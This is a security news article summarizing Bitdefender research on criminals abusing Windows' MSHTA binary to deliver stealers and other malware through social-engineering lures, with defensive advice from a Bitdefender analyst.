Well-meaning designs can sometimes backfire. MSHTA is a prime example of this.
MSHTA (Microsoft HTML Application) has been included in Windows since 1999, debuting with Windows 98 SE and Internet Explorer 5.0. It remains a component of Windows today, even in the most recent versions. It also continues to function within Microsoft Edge via IE mode. Its persistence aligns with Microsoft’s longstanding commitment to maintaining backward compatibility.
Over time, legitimate applications for MSHTA have dwindled. Conversely, its exploitation has surged. Cybercriminals increasingly leverage MSHTA as a Living-off-the-Land binary (LOLBIN) to stealthily deploy a wide array of malware – from common data stealers and loaders to sophisticated, persistent threats like PurpleFox.
Since the beginning of this year, BitDefender has observed a sharp increase in MSHTA-related malicious activity. The company attributes this spike to heightened threat actor exploitation rather than a resurgence in legitimate administrative use.
MSHTA
MSHTA is engineered to run HTML application (HTA) files, which are scripts composed using HTML, VBScript, or JavaScript. An HTA file fetched from an external server can be altered to execute VBScript directly in memory. The local system would only recognize the activity of a trusted, Microsoft-signed binary, not the hidden in-memory operations. Due to this inherent trust and its continued legitimate functionality, automatically blocking it is challenging. The consequence is that covert malicious code can be injected, which can then retrieve additional LOLBIN components, ultimately resulting in the deployment of harmful malware.
“MSHTA offers attackers a pre-installed, Microsoft-signed tool that can fetch and run remote script content during the initial or middle phases of an infection sequence,” BitDefender reports.
Attackers initiate the process using straightforward social engineering tactics.
Delivering malware
One frequent misuse of MSHTA identified by BitDefender involved the HTA CountLoader being used to deliver the Lumma and Amatera stealers. In one Lumma campaign, potential victims were lured via messages, social media posts, or SEO-poisoned websites advertising free or pirated software.
If the victim falls for the trick, they execute a setup file that is actually a Python interpreter, which then loads the Python runtime. The downloaded ‘free software’ package contains all the required scripts along with an MSHTA executable that connects to the attacker’s command-and-control server to fetch the HTA loader.
The HTA then decodes the subsequent payload and runs it. This action downloads and activates the stealer.
The Emmenhtal loader was also seen delivering Lumma and other stealers. This campaign began with phishing messages sent through Discord. The victim is deceived into visiting a webpage crafted to hijack the clipboard and trick the user into running a malicious command line as part of a fake human verification step. If the user is then further manipulated into pressing Win + R to open the Run dialog, followed by Ctrl + V and Enter to paste and execute the command, explorer.exe appears to legitimately launch MSHTA.
Ultimately, a PowerShell script is retrieved from a remote server and executed in memory without being saved to the hard drive.
Other MSHTA-driven campaigns have included the delivery of ClipBanker and PurpleFox. ClipBanker is a type of malware mainly created to swap cryptocurrency wallet addresses in the clipboard to steal funds. “In this infection sequence, MSHTA serves as an initial execution mechanism that starts a remote HTA and swiftly moves to PowerShell-based persistence and payload delivery,” BitDefender explains.
PurpleFox is a more complex and persistent malware family that has been operational since 2018. “One of its consistent delivery techniques, however, has remained unchanged: launching msiexec from an MSHTA command line to download and run an MSI package disguised as a .png file,” BitDefender states.
While the report provides details on indicators of compromise (IOCs), it is evident that social engineering plays a crucial role in MSHTA abuse – but the rise in such abuse also proves that social engineering tactics remain highly effective.
“The primary defense against this kind of attack is user awareness,” said Silviu Stahie, Security Analyst at Bitdefender. “If we can persuade people to stop executing commands in their terminals, in PowerShell, and similar tools, we could prevent most of these issues. The same applies to downloading cracked software or pirated games. There is a high probability of getting infected this way. I would estimate that over 90% of attacks would cease immediately if we simply stopped falling for these tricks.”
Defending against MSHTA abuse should naturally include user awareness training, but technical countermeasures are equally vital. “Protection must address multiple stages of the attack chain, from reducing the attack surface to pre-execution detection and runtime behavioral blocking,” the researchers caution.
“As for organizations,” Stahie continued, “blocking all these legacy binaries should be the standard approach. Unless you have a critical application that still requires MSHTA, users should not have access to it. It should be blocked at the firewall level.”
Related: Infostealers: The Silent Smash-and-Grab Driving Modern Cybercrime
Related: Cloned AI Tool Sites Distribute Malware in ‘InstallFix’ Campaign
Related: RATs in the Machine: Inside a Pakistan-Linked Cyber Assault on India
Related: Living off the AI: The Next Evolution of Attacker Tradecraft
